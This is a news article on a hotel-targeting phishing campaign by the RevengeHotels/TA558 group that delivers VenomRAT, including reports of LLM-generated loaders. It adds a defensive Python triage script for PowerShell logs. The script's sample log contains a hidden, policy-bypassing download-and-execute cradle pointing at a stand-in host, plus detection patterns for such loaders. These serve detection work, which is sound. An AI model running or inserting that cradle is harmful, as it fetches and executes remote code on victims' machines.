Researchers at Kaspersky have identified a new wave of attacks by the cybercrime group known as RevengeHotels (also tracked as TA558) targeting the hospitality sector. The campaign blends polished phishing with JavaScript/PowerShell loaders to deliver VenomRAT, and, notably, shows signs of large language model (LLM)-assisted code generation that improves speed, scale, and evasion.
Who TA558 targets and why hotels remain attractive
Active since at least 2015, TA558 focuses on hotels and travel‑adjacent organizations to harvest payment card data, booking platform credentials, and guest records. Hospitality operations often rely on email-driven workflows and interconnected PMS/POS systems, which creates a broad attack surface. Industry reporting, including recurring findings from the Verizon Data Breach Investigations Report, consistently ranks phishing and credential theft among the top initial access vectors in services sectors.
2025 campaign overview: regions, techniques, and tooling
The current activity observed in summer 2025 centers on hotels in Brazil, with additional victims in Spanish‑speaking markets such as Argentina, Bolivia, Chile, Costa Rica, Mexico, and Spain. Historically, TA558 has also been seen targeting organizations in Russia, Belarus, Turkey, Malaysia, Italy, and Egypt, indicating broad geographic interest and language agility.
Phishing to JS/PowerShell loaders to VenomRAT
Initial access begins with well-crafted phishing emails posing as invoices, reservation requests, or job applications. Links lead to staged content that pulls a chain of JavaScript and PowerShell downloaders, culminating in installation of VenomRAT. The tradecraft maps to MITRE ATT&CK techniques including T1566 (Phishing), T1204 (User Execution), and T1059 (Command and Scripting Interpreter).
LLM in the infection chain: why AI matters to defenders
Kaspersky’s analysis indicates that portions of the initial compromise scripts and implant delivery routines were likely generated by LLM agents. Automated script creation speeds up phishing page development, tailors loaders to diverse environments, and expedites iterative changes to bypass signature‑based detections. While LLM assistance does not make malware undetectable, it raises attacker throughput and lowers the skill barrier, enabling larger campaigns at similar cost.
What VenomRAT is and how it is used
VenomRAT, a derivative of the open‑source QuasarRAT family, provides remote control of compromised hosts, credential theft, and persistence tooling. Criminal marketplaces continue to distribute VenomRAT, with “lifetime” licenses advertised in the hundreds of US dollars. Despite source code leaks, VenomRAT remains popular due to its features, flexibility, and low operational friction for threat actors.
Business impact: from front desk to finance
Compromised endpoints in front office, reservations, or accounting can expose cardholder data, PMS/checkout credentials, and guests’ personal information. Even large hotel brands face risk if basic controls are missing—especially multi‑factor authentication (MFA), network segmentation between PMS, POS, and guest Wi‑Fi, and least‑privilege administration.
Expert perspective
“The group’s tactics are recognizable, but the tooling is evolving—several malicious components were likely authored with LLMs. It’s a clear example of how AI can accelerate cybercrime. Users and businesses should stay vigilant—even messages that appear to come from trusted brands can be part of a well‑prepared phish,” said Dmitry Galov, Head of Kaspersky GReAT in Russia.
Risk reduction for hotels: practical controls that work
– Harden email security with SPF/DKIM/DMARC, URL and attachment isolation, and sandboxing. Constrain script execution (e.g., PowerShell Constrained Language Mode, AppLocker/WDAC) and disable unnecessary JS/PowerShell where feasible.
– Deploy EDR/XDR with telemetry on script interpreters and block known RAT artifacts; monitor anomalous PowerShell, WMI, and process injection activity.
– Enforce MFA on PMS, payment gateways, and remote access; segment POS, PMS, back office, and guest networks to limit lateral movement.
– Minimize card data storage, adopt tokenization, and maintain PCI DSS compliance with regular assessments and logging.
– Run ongoing phishing awareness training and realistic attack simulations for reservations, front‑desk, and finance teams.
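To make the script-interpreter monitoring in the list above concrete, here is an added example (not Kaspersky's tooling, and not a signature for VenomRAT or TA558): a Python triage script that scores PowerShell script-block records for the generic loader behaviours a defender would watch for in a phishing-to-JS/PowerShell chain, namely download cradles, Invoke-Expression, encoded or base64-decoded commands, hidden-window and execution-policy-bypass flags, and script hosts launched from user-writable paths. The pipe-delimited export format, the rule names and weights, the alert threshold, and the sample log lines are all constructed assumptions for illustration; the base64 decoder exists so an analyst can see what an encoded block would actually run before deciding.

```python
"""
Heuristic triage of PowerShell script-block (Event 4104) text for loader tells.
Added example for this article, not Kaspersky's tooling and not a signature for
VenomRAT or TA558. Export format, rule names, weights, threshold and the sample
records are assumptions made for illustration.
"""
import base64
import re
from dataclasses import dataclass, field

# (name, weight, regex): generic loader behaviours, not family-specific indicators.
RULES = [
    ("download_cradle", 3, re.compile(
        r"\b(Invoke-WebRequest|iwr|DownloadString|DownloadFile|Net\.WebClient|"
        r"Invoke-RestMethod|irm|Start-BitsTransfer)\b", re.I)),
    ("invoke_expression", 3, re.compile(r"\b(iex|Invoke-Expression)\b", re.I)),
    ("encoded_command", 3, re.compile(
        r"-(enc|encodedcommand|ec)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("policy_bypass", 2, re.compile(r"-(ExecutionPolicy|ep)\s+bypass", re.I)),
    ("hidden_window", 2, re.compile(r"-(WindowStyle|w)\s+hidden", re.I)),
    ("script_host_from_user_path", 4, re.compile(
        r"\b(wscript|cscript|mshta)(\.exe)?\b[^\n]*\\(Temp|Downloads|AppData)\\"
        r"\S*\.(js|jse|vbs|hta)\b", re.I)),
    ("base64_decode", 2, re.compile(r"FromBase64String", re.I)),
]
ALERT_THRESHOLD = 4  # assumed tuning point; calibrate against your own baseline
B64_RUN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Constructed records in an assumed 'EventID|Computer|User|ScriptBlockText' export.
SAMPLE_LOG = r"""
4104|FRONTDESK-01|HOTEL\reception|Get-ChildItem C:\Reports | Sort-Object LastWriteTime
4104|FRONTDESK-01|HOTEL\reception|powershell -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
4104|RESERV-02|HOTEL\booking|$p=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwByAGkAdABlAC0ASABvAHMAdAA='))
4104|ACCT-03|HOTEL\finance|wscript.exe C:\Users\finance\AppData\Local\Temp\invoice_4471.js
4104|ACCT-03|HOTEL\finance|Import-Module ActiveDirectory; Get-ADUser -Filter *
"""


@dataclass
class Finding:
    computer: str
    user: str
    score: int = 0
    matched: list = field(default_factory=list)
    decoded: list = field(default_factory=list)

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def _printable(raw: bytes) -> str:
    """PowerShell -enc payloads are UTF-16LE (NUL high bytes for ASCII); else try UTF-8."""
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        text = raw.decode("utf-16-le")
    else:
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            return ""
    return text if text.isprintable() else ""


def decode_b64_candidates(text: str) -> list:
    """Decode long base64 runs so an analyst sees what an encoded block would run."""
    out = []
    for run in B64_RUN.findall(text):
        try:
            decoded = _printable(base64.b64decode(run, validate=True))
        except ValueError:  # binascii.Error: not valid base64 (bad padding/length)
            continue
        if decoded:
            out.append(decoded)
    return out


def score_script(text: str):
    """Apply every rule to one script block; return (total weight, rule names)."""
    score, names = 0, []
    for name, weight, rx in RULES:
        if rx.search(text):
            score += weight
            names.append(name)
    return score, names


def triage(log_text: str) -> list:
    """Score each 4104 record; decoded base64 payloads are re-scored as well."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split("|", 3)  # maxsplit keeps pipes inside the script text
        if len(parts) != 4 or parts[0] != "4104":
            continue
        _, computer, user, script = parts
        f = Finding(computer, user)
        f.score, f.matched = score_script(script)
        f.decoded = decode_b64_candidates(script)
        for payload in f.decoded:  # re-score what the block would execute
            extra, names = score_script(payload)
            f.score += extra
            f.matched += ["decoded:" + n for n in names]
        findings.append(f)
    return findings


if __name__ == "__main__":
    for fd in triage(SAMPLE_LOG):
        print("ALERT" if fd.alert else "ok   ", fd.computer, fd.user,
              fd.score, fd.matched, fd.decoded)
```

On the constructed sample the hidden-window download cradle and the wscript launch of a .js from Temp cross the threshold, while the lone FromBase64String call does not: its decoded payload is a harmless Write-Host, which is exactly why the decoder re-scores the decoded text rather than alerting on base64 alone. In production, feed this from an EDR/XDR or Windows event export, pair it with the blocking controls above (Constrained Language Mode, AppLocker/WDAC), and tune weights against the baseline of your own front-desk and finance hosts.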
TA558’s latest campaign underscores a durable reality: proven phishing tactics paired with AI‑accelerated development can rapidly compromise hotel operations and monetize guest data. Hotels and travel providers should assume persistent targeting and close foundational gaps—email hygiene, script control, EDR/XDR, MFA, and segmentation—while rehearsing incident response. Organizations that reduce attack surface and speed detection will significantly raise the cost of exploitation for threat actors.